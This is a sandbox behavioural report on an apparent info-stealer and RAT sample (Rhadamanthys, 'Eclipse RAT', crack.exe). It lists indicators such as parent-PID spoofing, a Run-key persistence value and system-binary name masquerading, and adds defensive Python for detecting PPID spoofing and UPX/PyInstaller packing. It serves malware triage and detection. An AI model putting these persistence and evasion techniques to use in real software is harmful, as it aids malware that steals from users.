Analysis

max time kernel:   117s
max time network:  114s
platform:          windows10-2004_x64
resource:          win10v2004-20240226-en
resource tags:     arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
submitted:         04-04-2024 16:01

Static task:       static1
URLScan task:      urlscan1
Behavioral task:   behavioral1
Sample:            https://file.io/V90fz4A5z12x
Resource:          win10v2004-20240226-en

General

Target: https://file.io/V90fz4A5z12x
Malware Config

Signatures

Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
Suspicious use of NtCreateUserProcessOtherParentProcess (3 IoCs)
A process created a child while supplying a different process as its parent (parent-PID spoofing). Each svchost.exe below is one of the dropped binaries listed under "Executes dropped EXE"; the three dialer.exe instances that the process tree shows under sihost.exe (PID 2888), the parent these calls supplied, are consistent with these three events.
Processes:
  description            pid   process      target process
  PID 968 created 2888   968   svchost.exe  sihost.exe
  PID 5684 created 2888  5684  svchost.exe  sihost.exe
  PID 1008 created 2888  1008  svchost.exe  sihost.exe
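The signature above records two facts per event: the process that issued the create call and the parent the new process ended up with. The Python below is an added example, not part of the sandbox report or of any tool it names, that uses that pair to flag parent-PID spoofing and to contrast the lineage a parent-only source such as Sysmon Event ID 1 would show with the real one. The records are constructed from this report's PIDs; the image paths for the dropped svchost.exe copies, the pairing of each dialer.exe with its creator, and the EXPECTED_CHILDREN baseline are assumptions.

```python
"""Separate the parent a process claims from the process that created it.

Added example, not part of the sandbox report. NtCreateUserProcess lets the
caller pass PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, so the new process records
whatever parent the caller chose (here sihost.exe) while the real creator is
something else (here the dropped svchost.exe copies). Sysmon Event ID 1 and
Security event 4688 show the recorded parent, so the creator PID has to come
from a source that keeps it, such as the sandbox's own API hook. Image paths
for the dropped svchost.exe copies, the dialer.exe/creator pairing and the
EXPECTED_CHILDREN baseline are assumptions, not facts from the report.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str
    parent_pid: int   # parent recorded on the new process object (attacker-chosen)
    creator_pid: int  # process whose thread issued the create call; 0 = unknown


# Constructed from the report's PIDs; svchost.exe paths are assumed.
SAMPLE = [
    ProcEvent(2888, r"C:\Windows\System32\sihost.exe", 0, 0),
    ProcEvent(968,  r"C:\Users\Admin\svchost.exe", 0, 0),   # path assumed
    ProcEvent(5684, r"C:\Users\Admin\svchost.exe", 0, 0),   # path assumed
    ProcEvent(1008, r"C:\Users\Admin\svchost.exe", 0, 0),   # path assumed
    ProcEvent(3564, r"C:\Windows\SysWOW64\dialer.exe", 2888, 968),
    ProcEvent(6788, r"C:\Windows\SysWOW64\dialer.exe", 2888, 5684),
    ProcEvent(7996, r"C:\Windows\SysWOW64\dialer.exe", 2888, 1008),
]

# Fallback for telemetry that only carries the recorded parent: children a given
# system process is expected to spawn. An assumption to tune per fleet.
EXPECTED_CHILDREN = {"sihost.exe": set()}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def index(events):
    return {e.pid: e for e in events}


def describe(by_pid, pid):
    return (pid, basename(by_pid[pid].image) if pid in by_pid else "?")


def find_ppid_spoofing(events):
    """Creator known and different from the recorded parent => spoofed parent."""
    by_pid = index(events)
    return [
        {"pid": e.pid, "image": basename(e.image),
         "declared_parent": describe(by_pid, e.parent_pid),
         "actual_creator": describe(by_pid, e.creator_pid)}
        for e in events
        if e.creator_pid and e.creator_pid != e.parent_pid
    ]


def lineage(events, pid, field):
    """Walk up via 'parent_pid' (what Sysmon shows) or 'creator_pid' (who really spawned it)."""
    by_pid = index(events)
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(basename(by_pid[pid].image))
        pid = getattr(by_pid[pid], field)
    return chain


def unexpected_children(events):
    """Recorded-parent heuristic: a baselined system process with an unlisted child."""
    by_pid = index(events)
    hits = []
    for e in events:
        parent = by_pid.get(e.parent_pid)
        if parent is None:
            continue
        pname = basename(parent.image)
        if pname in EXPECTED_CHILDREN and basename(e.image) not in EXPECTED_CHILDREN[pname]:
            hits.append((pname, basename(e.image), e.pid))
    return hits


if __name__ == "__main__":
    for f in find_ppid_spoofing(SAMPLE):
        print(f"PPID spoofing: {f['image']} {f['pid']} claims parent {f['declared_parent']} "
              f"but was created by {f['actual_creator']}")
    print("apparent lineage:", " <- ".join(lineage(SAMPLE, 3564, "parent_pid")))
    print("actual lineage:  ", " <- ".join(lineage(SAMPLE, 3564, "creator_pid")))
    print("unexpected children:", unexpected_children(SAMPLE))
```

The creator-versus-parent comparison is the reliable test; the EXPECTED_CHILDREN heuristic is what remains when only the recorded parent is logged, and it needs a baseline built from your own hosts before it is trusted.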
Checks computer location settings (2 TTPs, 3 IoCs)
Looks up country code configured in the registry, likely geofence.
Processes:
  All three rows query the same value:
    \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation
  description        process
  Key value queried  Eclipse.exe
  Key value queried  crack.exe
  Key value queried  Eclipse.exe
Executes dropped EXE (14 IoCs)
The dropped files named svchost.exe and explorer.exe borrow the names of Windows system binaries; the Run-key and PyInstaller signatures below show them running from user-writable paths (C:\Users\Admin\explorer.exe, C:\Users\Admin\Downloads\Eclipse RAT\explorer.exe, C:\Users\Admin\AppData\Roaming\explorer.exe).
Processes (pid, process):
  5480  Eclipse.exe
  968   svchost.exe
  4568  explorer.exe
  4284  explorer.exe
  7936  explorer.exe
  7724  explorer.exe
  3844  crack.exe
  5684  svchost.exe
  3928  explorer.exe
  3204  explorer.exe
  5792  Eclipse.exe
  1008  svchost.exe
  1488  explorer.exe
  7388  explorer.exe
Loads dropped DLL (30 IoCs)
Processes (pid, process, events):
  4284  explorer.exe  6
  7724  explorer.exe  8
  3204  explorer.exe  8
  7388  explorer.exe  8
UPX packed file (yara rule: upx)
The python310.dll hit sits in %TEMP%\_MEI45682, the directory a PyInstaller one-file bundle extracts itself into at runtime; the remaining hits are memory regions of the dropped explorer.exe processes 4284, 7724 and 3204.
Processes:
  resource                                                                        yara_rule
  C:\Users\Admin\AppData\Local\Temp\_MEI45682\python310.dll                       upx
  behavioral1/memory/4284-583-0x00007FF8E1780000-0x00007FF8E1BE6000-memory.dmp    upx
  behavioral1/memory/4284-592-0x00007FF8F49D0000-0x00007FF8F49DF000-memory.dmp    upx
  behavioral1/memory/4284-593-0x00007FF8E23A0000-0x00007FF8E23B8000-memory.dmp    upx
  behavioral1/memory/4284-594-0x00007FF8E1CE0000-0x00007FF8E1D0C000-memory.dmp    upx
  behavioral1/memory/4284-596-0x00007FF8E3620000-0x00007FF8E3644000-memory.dmp    upx
  behavioral1/memory/4284-629-0x00007FF8E1780000-0x00007FF8E1BE6000-memory.dmp    upx
  behavioral1/memory/7724-649-0x00007FF8EC3E0000-0x00007FF8EC846000-memory.dmp    upx
  behavioral1/memory/7724-652-0x00007FF8FD700000-0x00007FF8FD724000-memory.dmp    upx
  behavioral1/memory/7724-653-0x00007FF8FD6F0000-0x00007FF8FD6FF000-memory.dmp    upx
  behavioral1/memory/7724-659-0x00007FF8FD6D0000-0x00007FF8FD6E8000-memory.dmp    upx
  behavioral1/memory/7724-663-0x00007FF8FD6A0000-0x00007FF8FD6CC000-memory.dmp    upx
  behavioral1/memory/7724-660-0x00007FF8FD670000-0x00007FF8FD67D000-memory.dmp    upx
  behavioral1/memory/7724-665-0x00007FF8FD680000-0x00007FF8FD699000-memory.dmp    upx
  behavioral1/memory/7724-748-0x00007FF8EC3E0000-0x00007FF8EC846000-memory.dmp    upx
  behavioral1/memory/7724-749-0x00007FF8FD700000-0x00007FF8FD724000-memory.dmp    upx
  behavioral1/memory/3204-845-0x00007FF8E2E00000-0x00007FF8E3266000-memory.dmp    upx
  behavioral1/memory/3204-847-0x00007FF8F47F0000-0x00007FF8F4814000-memory.dmp    upx
  behavioral1/memory/3204-859-0x00007FF8F8180000-0x00007FF8F818F000-memory.dmp    upx
  behavioral1/memory/3204-860-0x00007FF8F4620000-0x00007FF8F464C000-memory.dmp    upx
  behavioral1/memory/3204-861-0x00007FF8F49D0000-0x00007FF8F49DD000-memory.dmp    upx
  behavioral1/memory/3204-862-0x00007FF8F47D0000-0x00007FF8F47E8000-memory.dmp    upx
Adds Run key to start application (2 TTPs, 3 IoCs)
Processes:
  description      ioc                                                                                                                                                              process
  Set value (str)  \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update64 = "C:\\Users\\Admin\\explorer.exe"                       explorer.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update64 = "C:\\Users\\Admin\\Downloads\\Eclipse RAT\\explorer.exe"  explorer.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update64 = "C:\\Users\\Admin\\Downloads\\Eclipse RAT\\explorer.exe"  explorer.exe
Detects Pyinstaller (1 IoCs)
Processes:
  resource                                      yara_rule
  C:\Users\Admin\AppData\Roaming\explorer.exe   pyinstaller
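The two yara hits above (upx on python310.dll and on memory regions, pyinstaller on the dropped explorer.exe) are cheap static indicators a triager can reproduce without the sandbox. The Python below is an added example, not part of the report, that reads a PE section table with the standard library alone and searches for the PyInstaller archive cookie. The PE images it checks are constructed in build_sample() and are not loadable executables; the cookie constant and header offsets are from the public PE and PyInstaller formats.

```python
"""Static checks for two indicators the report raised: UPX section names and a PyInstaller archive.

Added example, not part of the sandbox report. Reads the PE section table with
the standard library only (no pefile) and searches for the PyInstaller CArchive
cookie. Both are indicators rather than proof: UPX section names are trivially
renamed, and the cookie appears in any file that embeds a PyInstaller bundle.
The sample images come from build_sample() and are constructed, not real files.
"""
import struct

PYINSTALLER_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"   # CArchive cookie written by PyInstaller
PE32PLUS_OPT_HEADER = 0xF0                       # size of the PE32+ optional header


def section_names(pe):
    """Return the section names of a PE image, in section-table order."""
    if pe[:2] != b"MZ":
        raise ValueError("not a PE image: missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image: bad PE signature")
    coff = e_lfanew + 4                                   # IMAGE_FILE_HEADER
    (nsections,) = struct.unpack_from("<H", pe, coff + 2)  # NumberOfSections
    (opt_size,) = struct.unpack_from("<H", pe, coff + 16)  # SizeOfOptionalHeader
    table = coff + 20 + opt_size                          # first IMAGE_SECTION_HEADER
    names = []
    for i in range(nsections):
        raw = pe[table + 40 * i: table + 40 * i + 8]      # 8-byte Name field
        names.append(raw.rstrip(b"\0").decode("ascii", "replace"))
    return names


def triage(pe):
    names = section_names(pe)
    return {
        "sections": names,
        "upx": any(n.upper().startswith("UPX") for n in names),
        "pyinstaller": PYINSTALLER_MAGIC in pe,
    }


def build_sample(names, overlay=b""):
    """Constructed minimal PE32+ image: DOS header, file header, zeroed optional header, section table, overlay."""
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    # Machine=x64, NumberOfSections, TimeDateStamp, PointerToSymbolTable, NumberOfSymbols,
    # SizeOfOptionalHeader, Characteristics (EXECUTABLE_IMAGE | LARGE_ADDRESS_AWARE)
    file_header = struct.pack("<HHIIIHH", 0x8664, len(names), 0, 0, 0, PE32PLUS_OPT_HEADER, 0x22)
    sections = b"".join(n.encode("ascii").ljust(8, b"\0") + bytes(32) for n in names)
    return bytes(dos) + b"PE\0\0" + file_header + bytes(PE32PLUS_OPT_HEADER) + sections + overlay


if __name__ == "__main__":
    packed = build_sample(["UPX0", "UPX1", ".rsrc"], overlay=bytes(64) + PYINSTALLER_MAGIC + bytes(16))
    print(triage(packed))
    print(triage(build_sample([".text", ".rdata", ".data"])))
```

On a real sample, pass the file bytes to triage(); a PyInstaller one-file executable carries the cookie near the end of the appended archive, and the bundled DLLs (such as the python310.dll seen here) only surface once the program has extracted itself into %TEMP%\_MEI*.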
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
Enumerates system info in registry (2 TTPs, 3 IoCs)
All three reads come from msedge.exe, the browser the sandbox launched to open the submitted URL (PID 1852 in the process tree), not from the dropped samples.
Processes:
  description        ioc                                                                     process
  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS                     msedge.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer  msedge.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName   msedge.exe
Kills process with taskkill (1 IoCs)
Processes (pid, process):
  6932  taskkill.exe
Modifies Internet Explorer settings
Processes:
  description       ioc                                                                                                                          process
  Key created       \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser      explorer.exe
  Set value (data)  \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  explorer.exe
  Key created       \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Software\Microsoft\Internet Explorer\Toolbar                   explorer.exe
  Set value (int)   \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1"     explorer.exe
Modifies registry class (34 IoCs)
These rows are Windows Explorer folder-view state (ShellBags: BagMRU and Bags\1 for a folder sniffed as "Downloads", Bags\2 for a generic folder) plus two COM Instance keys, with one Local Settings key each from msedge.exe and rundll32.exe. The rows carry no PIDs, so they cannot be tied to a particular one of the several explorer.exe instances; forensically they record which folder views were opened rather than anything the sample configured.
Processes:
  Abbreviations used below:
    CLASSES = \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes
    SHELL   = CLASSES\Local Settings\Software\Microsoft\Windows\Shell
    BAG1    = SHELL\Bags\1\Shell\{885A186E-A440-4ADA-812B-DB871B942259}

  description       ioc                                                                                        process
  Set value (int)   BAG1\Rev = "0"                                                                             explorer.exe
  Set value (int)   BAG1\LogicalViewMode = "1"                                                                 explorer.exe
  Set value (data)  BAG1\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000  explorer.exe
  Set value (str)   BAG1\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}"                          explorer.exe
  Key created       SHELL\BagMRU\0                                                                             explorer.exe
  Key created       SHELL\BagMRU\0\0\0                                                                         explorer.exe
  Key created       BAG1                                                                                       explorer.exe
  Set value (int)   BAG1\GroupByDirection = "4294967295"                                                       explorer.exe
  Key created       CLASSES\Local Settings                                                                     explorer.exe
  Key created       SHELL\BagMRU\0\0\0\0                                                                       explorer.exe
  Set value (int)   BAG1\GroupView = "4294967295"                                                              explorer.exe
  Set value (int)   BAG1\Version = "1"                                                                         explorer.exe
  Key created       \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\  explorer.exe
  Set value (data)  SHELL\BagMRU\NodeSlots = 0202                                                              explorer.exe
  Key created       SHELL\Bags\1\Shell                                                                         explorer.exe
  Set value (str)   SHELL\Bags\1\Shell\SniffedFolderType = "Downloads"                                         explorer.exe
  Set value (int)   BAG1\FFlags = "1092616193"                                                                 explorer.exe
  Key created       SHELL\Bags\2\Shell                                                                         explorer.exe
  Key created       SHELL                                                                                      explorer.exe
  Key created       SHELL\BagMRU                                                                               explorer.exe
  Key created       SHELL\BagMRU\0\0                                                                           explorer.exe
  Key created       CLASSES\Local Settings                                                                     msedge.exe
  Key created       CLASSES\Local Settings\Software\Microsoft\Windows\CurrentVersion\WorkFolders               rundll32.exe
  Key created       SHELL\BagMRU\0\0\0\0\0\0                                                                   explorer.exe
  Set value (int)   BAG1\Mode = "4"                                                                            explorer.exe
  Key created       SHELL\BagMRU\0\0\0\0\0                                                                     explorer.exe
  Key created       CLASSES\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\                             explorer.exe
  Set value (str)   BAG1\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}"                                        explorer.exe
  Set value (data)  SHELL\BagMRU\MRUListEx = 00000000ffffffff                                                  explorer.exe
  Set value (int)   BAG1\FFlags = "1092616209"                                                                 explorer.exe
  Set value (int)   BAG1\IconSize = "16"                                                                       explorer.exe
  Set value (data)  BAG1\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff  explorer.exe
  Set value (int)   BAG1\GroupByKey:PID = "14"                                                                 explorer.exe
  Set value (str)   SHELL\Bags\2\Shell\SniffedFolderType = "Generic"                                           explorer.exe
Suspicious behavior: AddClipboardFormatListener (1 IoCs)
Processes (pid, process):
  3488  explorer.exe

Suspicious behavior: EnumeratesProcesses (46 IoCs)
Processes (pid, process, events):
  3836  msedge.exe           2
  1852  msedge.exe           2
  7540  identity_helper.exe  2
  5844  msedge.exe           2
  1240  msedge.exe           2
  5412  powershell.exe       3
  5208  powershell.exe       3
  968   svchost.exe          2
  3564  dialer.exe           4
  7716  powershell.exe       3
  8172  powershell.exe       3
  5684  svchost.exe          2
  6788  dialer.exe           4
  5416  powershell.exe       3
  5164  powershell.exe       3
  1008  svchost.exe          2
  7996  dialer.exe           4

Suspicious behavior: GetForegroundWindowSpam (1 IoCs)
Processes (pid, process):
  3488  explorer.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (53 IoCs)
Processes (pid, process, events):
  1852  msedge.exe  53

Suspicious use of AdjustPrivilegeToken (11 IoCs)
Processes (description, pid, process):
  Token: SeRestorePrivilege   7040  7zG.exe
  Token: 35                   7040  7zG.exe        (privilege LUID 35 is SeCreateSymbolicLinkPrivilege)
  Token: SeSecurityPrivilege  7040  7zG.exe
  Token: SeSecurityPrivilege  7040  7zG.exe
  Token: SeDebugPrivilege     5412  powershell.exe
  Token: SeDebugPrivilege     5208  powershell.exe
  Token: SeDebugPrivilege     6932  taskkill.exe
  Token: SeDebugPrivilege     7716  powershell.exe
  Token: SeDebugPrivilege     8172  powershell.exe
  Token: SeDebugPrivilege     5164  powershell.exe
  Token: SeDebugPrivilege     5416  powershell.exe

Suspicious use of FindShellTrayWindow (64 IoCs)
Processes (pid, process, events):
  1852  msedge.exe  64

Suspicious use of SendNotifyMessage (26 IoCs)
Processes (pid, process, events):
  1852  msedge.exe  26

Suspicious use of SetWindowsHookEx (20 IoCs)
Processes (pid, process, events):
  5480  Eclipse.exe   1
  968   svchost.exe   1
  4568  explorer.exe  1
  4284  explorer.exe  1
  7936  explorer.exe  1
  7724  explorer.exe  1
  3488  explorer.exe  6
  3844  crack.exe     1
  5684  svchost.exe   1
  3928  explorer.exe  1
  3204  explorer.exe  1
  5792  Eclipse.exe   1
  1008  svchost.exe   1
  1488  explorer.exe  1
  7388  explorer.exe  1

Suspicious use of WriteProcessMemory (64 IoCs)
Every source is the Edge browser process (1852) and every target is one of its own child processes (the crashpad handler 3776, GPU process 3696, network service 3836 and storage service 1792 in the process tree). This is Chromium's normal multi-process start-up, not injection by the sample.
Processes:
  PID 1852 msedge.exe wrote to memory of msedge.exe 3776, 3696, 3836 and 1792 (64 events in total)
Processes

C:\Windows\system32\sihost.exe
  command line: sihost.exe
  PID: 2888

  C:\Windows\SysWOW64\dialer.exe
    command line: "C:\Windows\system32\dialer.exe"
    - Suspicious behavior: EnumeratesProcesses
    PID: 3564

  C:\Windows\SysWOW64\dialer.exe
    command line: "C:\Windows\system32\dialer.exe"
    - Suspicious behavior: EnumeratesProcesses
    PID: 6788

  C:\Windows\SysWOW64\dialer.exe
    command line: "C:\Windows\system32\dialer.exe"
    - Suspicious behavior: EnumeratesProcesses
    PID: 7996

  The three dialer.exe instances appear under sihost.exe only because their creators supplied it as the parent (see "Suspicious use of NtCreateUserProcessOtherParentProcess"). Their command line names System32 while the image loaded from SysWOW64, which is WOW64 file-system redirection: the process that launched them was 32-bit, and so is the dialer.exe that resulted.

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://file.io/V90fz4A5z12x
  - Enumerates system info in registry
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID: 1852

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8f42846f8,0x7ff8f4284708,0x7ff8f4284718
    PID: 3776

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2184 /prefetch:2
    PID: 3696

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 /prefetch:3
    - Suspicious behavior: EnumeratesProcesses
    PID: 3836

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2644 /prefetch:8
    PID: 1792

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
    PID: 3280

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
    PID: 4748

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5380 /prefetch:1
    PID: 2224

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5616 /prefetch:1
    PID: 432

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5760 /prefetch:1
    PID: 4496

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5968 /prefetch:1
    PID: 1072

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6112 /prefetch:1
    PID: 2452

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5592 /prefetch:1
    PID: 3148

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6616 /prefetch:8
    PID: 2772

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6552 /prefetch:1
    PID: 2536

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6984 /prefetch:8
    PID: 524

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7136 /prefetch:1
    PID: 5136

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7128 /prefetch:1
    PID: 5144

